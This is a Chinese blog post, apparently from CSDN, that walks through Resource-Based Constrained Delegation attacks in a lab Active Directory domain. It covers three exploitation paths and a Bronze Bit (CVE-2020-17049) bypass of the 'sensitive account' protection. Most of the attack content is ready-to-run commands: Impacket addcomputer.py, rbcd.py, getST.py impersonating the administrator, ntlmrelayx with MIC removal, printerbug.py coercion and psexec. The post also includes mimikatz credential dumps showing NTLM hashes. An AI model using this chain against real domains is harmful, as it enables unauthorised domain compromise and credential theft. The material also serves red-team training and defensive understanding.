基于资源约束委派利用

置顶 已于 2023-03-26 02:22:59 修改
阅读量773 收藏 2
点赞数 1
分类专栏: 域安全 文章标签: 安全漏洞 信息安全 网络 运维 系统安全
于 2023-02-25 15:29:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129203785
版权

文章目录

序言
笔者已经写过了非约束委派和约束委派的利用,这篇文章主要是讲解,
基于资源的约束委派利用,对非约束委派和约束委派利用感兴趣的小伙伴,
可以看看我之前写过的文章。
基于资源约束委派简介(RBCD)
基于资源的约束委派是在微软在Windows Server 2012 中加入的,
相较于非约束为委派和约束委派不需要通过具备SeEnableDelegationPrivilege
权限的域管理员进行修改,而是进行了反转了将设置属性的权限给了服务资源本身。
配置了基于资源的约束委派的账户属性有如下变化:
msDS-AllowedToActOnBehalfOfOtherIdentity属性指向委派账户
传统委派与基于资源的约束委派区别如下:
	假设有服务1和服务2,服务1委派到服务2
	1.msDS-AllowedToDelegateTo 属性与
	msDS-AllowedToActOnBehalfOfOtherIdentity 属性的区别:
	传统委派:
		服务1上设置 msDS-AllowedToDelegateTo 属性,
		以指定对服务2上的哪一个服务进行委派。
	基于资源的约束委派:
		服务2上将 msDS-AllowedToActOnBehalfOfOtherIdentity 属性值设为
		服务1的 SID,以允许服务1对服务2上的服务进行委派。
	2.传统委派的ST可以进行转发基于资源的约束委派的ST不可转发:
		传统委派:
			S4u2self 申请到的 ST 票据是可转发的,如果不可转发,
			则后续的 S4U2Proxy 阶段将失败。
		基于资源的约束委派:
			不可转发的 ST 票据仍然可以通过 S4U2Proxy 阶段对其他服务进行委派认证。
基于资源约束委派的利用条件
1.具有对主机修改msDS-AllowedToActOnBehalfOfOtherIdentity属性的权限
2.可以创建机器账户或已知机器账户
从上述的利用条件可以看到需要有两个条件下面将进行分别讲解。
msDS-AllowedToActOnBehalfOfOtherIdentity属性的权限:
	(1)Account Operator组成员。
	(2)将该主机加入域的用户账户拥有该权限,用户账户中有叫mSDS-CreatorSID属性,
	用于标记加入域时使用的用户账户SID值,可以知道那些用户账户了有具有加入域权限。
	(3)该主机的机器账户。
环境介绍
192.168.126.10	普通域内机器(攻击机DESKTOP-IOFJA89$)
192.168.126.66	域控机器(WIN-CRJVMOIER7V$)
192.168.126.22	基于资源约束委派的测试机(WIN10ZYYSWP$,入域账号test\ziyuan)
使用Adfind侦查
如果不在域的话需要指定 -h X.X.X.X -u user123 -up password123 -b "DC=test,DC=com"
例子:AdFind.exe -h X.X.X.X -u user123 -up password123 -b "DC=test,DC=com" -f "objectClass=computer" mS-DS-CreatorSID
查询方式1:由机器查询入域的账号
查找机器账户的mS-DS-CreatorSID属性(入域账号的SID)
命令:AdFind.exe -f "objectClass=computer" mS-DS-CreatorSID

在这里插入图片描述

根据域账号SID查询域账号信息:
命令:Adfind.exe -sc adsid:S-1-5-21-380788182-2473631355-2237387945-1114

在这里插入图片描述

查询方式2:由域账号SID查询入域的机器:
查询的SID:S-1-5-21-380788182-2473631355-2237387945-1114
命令:
	AdFind.exe -f "(&(objectClass=computer)(mS-DS-CreatorSID=S-1-5-21-380788182-2473631355-2237387945-1114))" dn

在这里插入图片描述

查询方式3:由域账号名称查询入域的机器:
步骤1查询的域账号:ziyuan
	命令:
		Adfind.exe -b DC=test,DC=com -f "(&(objectCategory=person)(objectClass=user)(sAMAccountName=ziyuan))"

在这里插入图片描述

步骤2根据查找到的objectSid属性来查询入域的机器:
	objectSid: S-1-5-21-380788182-2473631355-2237387945-1114
	AdFind.exe -f "(&(objectClass=computer)(mS-DS-CreatorSID=S-1-5-21-380788182-2473631355-2237387945-1114))" dn

在这里插入图片描述

根据域账号ziyuan查询到入域机器WIN10ZYYSWP。
bloodhound查看

在这里插入图片描述
在这里插入图片描述

利用方式1(拿下目标机器入域的域账号Impacket利用)
假设在某机器上拿到了ziyuan的域用户NTLM Hash。
Authentication Id : 0 ; 293611 (00000000:00047aeb)
Session           : Interactive from 1
User Name         : ziyuan
Domain            : TEST
Logon Server      : WIN-CRJVMOIER7V
Logon Time        : 2023/2/24 16:17:52
SID               : S-1-5-21-380788182-2473631355-2237387945-1114
        msv :
         [00000003] Primary
         * Username : ziyuan
         * Domain   : TEST
         * NTLM     : 3d9a47d42cb82e0b7cbbaf2b20454e3a
         * SHA1     : c7fd5677da2c87685cb449b90df9618441c81af9
         * DPAPI    : a1b8917763b2f283dbf6f94d1a53a457
        tspkg :
        wdigest :
         * Username : ziyuan
         * Domain   : TEST
         * Password : (null)
        kerberos :
         * Username : ziyuan
         * Domain   : TEST.COM
         * Password : (null)
        ssp :
        credman :

在这里插入图片描述

支持两种方式创建一种是SAMR协议,另一种是LDAPS协议
利用步骤1 创建机器账号
	创建机器账号mmm123密码password123
	SAMR协议创建机器账号 NTLM Hash:
		python3 addcomputer.py -computer-name 'mmm123' -computer-pass 'password123' -dc-ip 192.168.126.66 'test.com/ziyuan' -hashes 0:3d9a47d42cb82e0b7cbbaf2b20454e3a -method SAMR -debug
	SAMR协议创建机器账号使用明文密码:
		python3 addcomputer.py -computer-name 'mmm123' -computer-pass 'password123' -dc-ip 192.168.126.66 'test.com/hack:Password1234'  -method SAMR -debug
	LDAPS协议创建机器账号 NTLM Hash:
		python3 addcomputer.py -computer-name 'mmm123' -computer-pass 'password123' -dc-ip 192.168.126.66 'test.com/ziyuan' -hashes 0:3d9a47d42cb82e0b7cbbaf2b20454e3a -method LDAPS -debug
	LDAPS协议创建机器账号使用明文密码:
		python3 addcomputer.py -computer-name 'mmm123' -computer-pass 'password123' -dc-ip 192.168.126.66 'test.com/hack:Password1234'  -method LDAPS -debug

在这里插入图片描述

利用步骤2 Adfnd查询找到新增机器SID
使用Adfind查询新增机器账号mmm123$的sid
命令:AdFind.exe -f "(&(objectClass=computer)(sAMAccountName=mmm123$))" objectSid

在这里插入图片描述

S-1-5-21-380788182-2473631355-2237387945-1116
利用步骤3 使用rbcd.py脚本修改WIN10ZYYSWP机器账号属性
使用rbcd.py脚本修改WIN10ZYYSWP$的msDS-AllowedToActOnBehalfOfOtherIdentity属性写入mmm123$
	使用明文密码:
	python3 rbcd.py -delegate-to WIN10ZYYSWP$ -delegate-from mmm123$ -dc-ip 192.168.126.66 test/ziyuan:password123 -action write

在这里插入图片描述

使用NTLM hash:
需要注意LM Hash为空或者被禁用填写为aad3b435b51404eeaad3b435b51404ee:NTLM Hash或者空格:HTLM Hash
0:NTLM Hash这种格式会失败。
	python3 rbcd.py -delegate-to WIN10ZYYSWP$ -delegate-from hack1$ -dc-ip 192.168.126.66 'test/ziyuan' -hashes aad3b435b51404eeaad3b435b51404ee:3d9a47d42cb82e0b7cbbaf2b20454e3a -action write

在这里插入图片描述

利用步骤4 使用新增机器账号利用getST.py请求目标机器cifs服务的TGS票据
	注意:如果administrator域管账号配置了敏感账号不能被委派不会拿到TGS票据可以利用
	CVE-2020-17049 Kerberos Bronze Bit绕过下面会讲解。
	命令: python3 /home/kali/Desktop/AD/impacket-0.10.0/examples/getST.py -dc-ip 192.168.126.66 -spn cifs/WIN10ZYYSWP.test.com -impersonate administrator 'test.com/mmm123$:password123'

在这里插入图片描述

利用步骤5 导入TGS票据使用psexec.py或wmiexec.py登录目标机器
	需要注意要使用域内机器的代理才行
	export KRB5CCNAME=administrator.ccache						导入administrator票据
	proxychains python3 psexec.py -k test.com/administrator@WIN10ZYYSWP.test.com -no-pass -codec gbk

在这里插入图片描述

CVE-2020-17049 Kerberos Bronze Bit+基于资源的约束委派绕过敏感账号限制
请求的域管账号比如administrator如果配置了敏感账号不能被委派是请求cifs服务票据是会失败的。

在这里插入图片描述

以Impacker下的getST脚本为例,现在administrator配置了敏感账号如果请求cifs服务票据会出现以下错误。

在这里插入图片描述

新版本Impacket的getST脚本可以追加-force-forwardable参数自动利用CVE-2020-17049 Kerberos Bronze Bit
进行绕过,下面是演示实例。

在这里插入图片描述

利用方式2(Acount Operators组权限滥用进行基于资源约束委派获取目标权限)
Acount Operators组成员拥有修改域内除域控外任意主机msDS-AllowedToActOnBehalfOfOtherIdentity属性的权限,
在域渗透的时候该组是需要关注的对象之一。
利用条件:
	1.可以创建机器账号
	2.拥有Acount Operators组成员的用户账号
Adfind侦查:
	adfind.exe -s subtree -b CN="Account Operators",CN=Builtin,DC=test,DC=com member
	发现hacker域账号隶属于Acount Operators组成员

在这里插入图片描述

Acount Operators组配置:

在这里插入图片描述

bloodhound侦查:
	搜索ACCOUNT OPERATORS组展示组成员。

在这里插入图片描述

利用过程说明:
	利用过程基本上与利用方式1一样,只不过账号换成了hacker账号。
	1.拿到hacker域账号权限
	2.创建机器账号
	3.配置目标的机器账号msDS-AllowedToActOnBehalfOfOtherIdentity属性
	4.登录域控获得全域控制权
利用:
	1.在某台机器上抓取到了hacker的NTLM Hash(不是本篇文章重点的内容)
		Authentication Id : 0 ; 462840 (00000000:00070ff8)
		Session           : Interactive from 1
		User Name         : hacker
		Domain            : TEST
		Logon Server      : WIN-CRJVMOIER7V
		Logon Time        : 2023/2/25 12:50:26
		SID               : S-1-5-21-380788182-2473631355-2237387945-1118
		        msv :
		         [00000003] Primary
		         * Username : hacker
		         * Domain   : TEST
		         * NTLM     : 3d9a47d42cb82e0b7cbbaf2b20454e3a
		         * SHA1     : c7fd5677da2c87685cb449b90df9618441c81af9
		         * DPAPI    : 531cf802a7dd2cb9dff8e1d01db36566
		        tspkg :
		        wdigest :
		         * Username : hacker
		         * Domain   : TEST
		         * Password : (null)
		        kerberos :
		         * Username : hacker
		         * Domain   : TEST.COM
		         * Password : (null)
		        ssp :
		        credman :
	2.创建机器账号hacker666$
	python3 addcomputer.py -computer-name 'hacker666' -computer-pass 'password123' -dc-ip 192.168.126.66 'test.com/hacker' -hashes 0:3d9a47d42cb82e0b7cbbaf2b20454e3a -method SAMR -debug

在这里插入图片描述

	3.配置目标的机器账号msDS-AllowedToActOnBehalfOfOtherIdentity属性
	python3 rbcd.py -delegate-to WIN10ZYYSWP$ -delegate-from hacker666$ -dc-ip 192.168.126.66 'test/hacker' -hashes aad3b435b51404eeaad3b435b51404ee:3d9a47d42cb82e0b7cbbaf2b20454e3a -action write

在这里插入图片描述

4.获得目标cifs服务票据
python3 /home/kali/Desktop/AD/impacket-0.10.0/examples/getST.py -dc-ip 192.168.126.66 -spn cifs/WIN10ZYYSWP.test.com -impersonate administrator 'test.com/hacker666$:password123'

在这里插入图片描述

5.注入票据并使用psexec或wmiexec登录目标
export KRB5CCNAME=administrator.ccache						导入administrator票据
proxychains python3 psexec.py -k test.com/administrator@WIN10ZYYSWP.test.com -no-pass -codec gbk

在这里插入图片描述

利用方式3(Ntlm Relay+打印机bug+基于资源的约束委派拿下目标控制权)
利用说明:
	在用于任何AD账号的情况下,可以触发打印机bug使目标服务器回连到攻击者主机,并使用ntlmrelayx工具
	中继到域控的ldap服务配置目标服务器机器账号的msDS-AllowedToActOnBehalfOfOtherIdentity属性,
	从而拿到目标控制权。
利用条件:
	1.拥有域内账号权限
	2.可以创建机器账号
	3.目标开启打印机服务
利用过程:
	1.拿到一个名叫hacker888的普通域成员的权限
	Authentication Id : 0 ; 5664458 (00000000:00566eca)
	Session           : Interactive from 4
	User Name         : hacker888
	Domain            : TEST
	Logon Server      : WIN-CRJVMOIER7V
	Logon Time        : 2023/2/25 13:57:24
	SID               : S-1-5-21-380788182-2473631355-2237387945-1120
	        msv :
	         [00000003] Primary
	         * Username : hacker888
	         * Domain   : TEST
	         * NTLM     : 3d9a47d42cb82e0b7cbbaf2b20454e3a
	         * SHA1     : c7fd5677da2c87685cb449b90df9618441c81af9
	         * DPAPI    : 6be4e4449d97632f1ed31c4201a051d9
	        tspkg :
	        wdigest :
	         * Username : hacker888
	         * Domain   : TEST
	         * Password : (null)
	        kerberos :
	         * Username : hacker888
	         * Domain   : TEST.COM
	         * Password : (null)
	        ssp :
	        credman :
2.使用hacker888创建caixukun123$机器账号
	python3 addcomputer.py -computer-name 'caixukun123' -computer-pass 'password123' -dc-ip 192.168.126.66 'test.com/hacker888' -hashes 0:3d9a47d42cb82e0b7cbbaf2b20454e3a -method SAMR -debug

在这里插入图片描述

3.攻击机开启到域控Relay的ldap监听
	使用Ntlm Relay工具开启SMB身份验证通过LDAP中继到域控默认情况下,
	SMB中的NTLM身份验证:NEGOTIATE_SIGN为set状态会触发LDAP签名,
	从而导致Relay攻击失败,因此需要将需要将NEGOTIATE_SIGN设置为Not set,
	ntlmrelayx工具可以很方便绕过该MIC校验。
	命令:
		192.168.126.66 域控
		remove-mic 清除MIC标志
		--escalate-user用于提升指定用户权限用于自动提升
		python3 ntlmrelayx.py -t ldap://192.168.126.66 -smb2support --remove-mic --delegate-access --escalate-user caixukun123\$

在这里插入图片描述

4.使用printerbug.py脚本触发打印机强制认证ntlmrelayx脚本完成自动提权
	printerbug.py触发强制Windows主机通过MS-RPRN RPC接口向攻击者进行身份验证,
	Windows的MS-RPRN协议用于打印客户机和打印服务器之间的通信默认情况下是启用的,
	协议定义的RpcRemoteFindFirstPrinterChangeNotificationEx()调用创建一个
	远程更改通知对象,该对象监视对打印机对象的更改,并将更改通知发送到打印客户端,
	任何经过身份验证的域成员都可以连接到远程服务器的打印服务spoolsv.exe,
	并请求对一个新的打印作业进行更新令其将该通知发送给指定目标,之后它会将立即测试该连接,
	即向指定目标进行身份验证可以选择通过Kerberos或NTLM进行验证,
	另外微软表示这个bug是系统设计特点,无需修复。
	192.168.126.22				要获得控制权的目标
	192.168.126.137				攻击机
	命令:python3 printerbug.py test.com/hacker888@192.168.126.22 192.168.126.137 -hashes :3d9a47d42cb82e0b7cbbaf2b20454e3a

在这里插入图片描述

ntlmrelayx脚本完成自动提权设置:

在这里插入图片描述

5.使用getST.py申请服务票据
命令:
python3 /home/kali/Desktop/AD/impacket-0.10.0/examples/getST.py -dc-ip 192.168.126.66 -spn cifs/WIN10ZYYSWP.test.com -impersonate administrator 'test.com/caixukun123$:password123'

在这里插入图片描述

6.导入服务票据使用wmiexec或psexec获取目标控制权
export KRB5CCNAME=administrator.ccache						导入administrator票据
proxychains python3 psexec.py -k test.com/administrator@WIN10ZYYSWP.test.com -no-pass -codec gbk

在这里插入图片描述

总结
关于基于资源的约束委派本文章总共说了常用的三种利用方式:
1.Ntlm Relay+打印机bug+基于资源的约束委派拿下目标控制权
2.Acount Operators组权限滥用进行基于资源约束委派获取目标权限
3.拿下目标机器入域的域账号拿下目标控制权
以及一种绕过方式:
1.CVE-2020-17049 Kerberos Bronze Bit+基于资源的约束委派绕过敏感账号限制。
在实战当中基于资源的约束委派用法比较灵活而且是一种比较常用的攻击手法遇到的利用
相比约束委派要多是比较重要的域内攻击手法之一。
虚构之人
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
基于资源约束委派攻击
good good study
04-13 2078
基于资源约束委派 (RBCD:Resource Based Constrained Delegation):为了使⽤户/资源更加独⽴,微软在Windows Server 2012中引⼊了基于资源约束委派。基于资源约束委派不需要域管理员权限去设置,⽽把设置属性的权限赋予给了机器⾃身。 配置了基于资源约束委派的账户的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的值为被允许基于资源约束委派的账号的SID。如admin--pc的 msDS-AllowedT
【域权限维持】-基于资源约束委派(RBCD)
qq_41617902的博客
01-20 821
基于资源约束委派(RBCD)
基于资源约束委派
mingyqf的博客
02-23 819
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
基于资源约束委派(RBCD)学习
whojoe的博客
07-21 2845
基于资源约束委派(RBCD)学习原理环境搭建利用添加机器账户中继&委派无另一台机器权限有另一台机器权限参考文章 原理 环境搭建 主机 机器名 ip 用户 密码 版本 域控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 域内机器 user2.test.com 192.168.164.150
rbcd-attack:使用Impacket从外部进行基于Kerberos资源约束委派攻击
04-01
滥用基于Kerberos资源约束委派 TL; DR 此存储库是针对Windows Active Directory域中针对Kerberos资源约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是...
委派:基于闭包的委派,没有内存泄漏
02-28
Delegated是一个超小的软件包,可帮助您避免在使用基于闭包的委派时发生保留周期。 新媒体发布。 原始中级帖子(委派0.1.2) 。 :police_car_light: 警告! Delegated 2.0与Delegated 0.1.2不兼容。 如果您不想...
Linux使用Sudo委派权限
09-15
今天小编就为大家分享一篇关于Linux使用Sudo委派权限的文章,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
java设计模式之委派模式原理分析
08-25
主要介绍了java设计模式之委派模式原理分析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
域渗透之基于资源约束委派
qq_56426046的博客
11-15 434
REDTEAM\hack -> WriteProperty(将机器加入域的账号,也就是mS-DS-CreatorSID属性中的账户) NT AUTHORITY\SELF -> WriteProperty(机器账户自身也可以修改) 我们再回顾一个知识点,默认域控的ms-DS-MachineAccountQuota属性设置允许所有域用户向一个域添加 多达10个计算机帐户,就是说只要有一个域凭据就可以在域内任意添加机器账户。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定 谁可以被委派来控制我。
约束委派+利用约束委派生成黄金票据
a3320315的博客
06-21 1630
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 域内主机:系统:windows 2012R2,主机名:HyyMbb,ip:192.168.1.22 被委派用户test 测试用户test1 操作步骤 我们需要提前知道的信息 被委派用户的明文密码或者ntml 密码:123!@#qwe ntml:e5ae562ddfaa6b446c32764ab1ebf3ed 1、已经知道服务用户明文的条件下,我们可以用kekeo请求该用户
Kerberos中继攻击:滥用无约束委派(下)
systemino的博客
10-10 1036
上一篇文章,我只讲了中继攻击的基本理论,这篇文章,我会举两个示例来及具体说明。 示例1:使用计算机帐户和SpoolService漏洞获取DC同步权限 在第一种情况下,我们将滥用我的internal.corp实验室域中的计算机帐户的无约束委派权限。通过攻击用户testuser获得了此主机的管理权限,该用户是该主机上Administrators组的成员。我们将按照上面列出的步骤,首先获取Kerbe...
域账号与机器账号
03-16 3422
域内用户查询 当我们拥有一个域用户权限的账号的,可以通过以下两种方式对域内用户进行枚举 通过SAMR 协议查询 LDAP 查询 SAMR并不是一种协议,而是一个RPC(想知道这个是啥玩意的人儿已经去百度了,说实话我也不太清楚)接口,我们平时使用的net user /domain就是使用samr 进行查询的。 域用户存储于活动目录数据库里面,对其他用户可见。可以通过Ldap 去查询。 过滤语法如下 (&(objectCategory=person)(objectClass=user)) 机器用
内网安全:非约束委派 约束委派 资源约束委派
qq_61553520的博客
01-28 1561
实验靶场:redteam.red。
约束委派利用
qq_18811919的博客
02-23 510
讲述了约束委派利用包括CVE-2020-17049 Kerberos Bronze Bit利用与3种通常利用
DAY39:横向渗透
qq_49433473的博客
08-28 1722
哈希传递攻击概述(PTH) 、横向渗透横向移动工具合集使用及方法、Mimikatz 、Procdump+Mimikatz、psexec 、msf、CrackMapExec批量横向渗透、WMI 命令、Invoke-WmiCommand(PowerShell)
基于windows中委派的攻击思路(下)-基于资源约束委派
Shanfenglan's blog
12-16 3万+
文章目录1. 前言2. 技术点2.1 利用原理:那么如何获得一个机器账户呢?如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity?3. 利用过程:1. 利用powermad添加机器账户:2. 查询添加的机器账户的sid3. 修改msDS-AllowedToActOnBehalfOfOtherIdentity:3.1 win server 2012以上:3.2 win server 2012以下:4. 利用rubues获取票据5.利用impacket 1. 前
域渗透——基于资源约束委派利用
a3320315的博客
07-03 1822
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 委派的域内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24 域内普通用户: test,对win2008有写的权限 域内普通用户: test1 攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1 设置test的写权限 验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举w
windows中关于委派(delegation)的理解
热门推荐
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY非约束委派约束委派基于资源约束委派基于委派的攻击非约束委派攻击约束委派攻击基于资源约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派的配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
linux 子域 委派
最新发布
03-02
Linux子域委派是一种在Linux系统中实现权限管理和...管理员可以使用SELinux策略来限制用户对系统资源的访问。 总之,Linux子域委派是一种有效的权限管理和访问控制方法,可以帮助管理员提高系统的安全性和管理效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值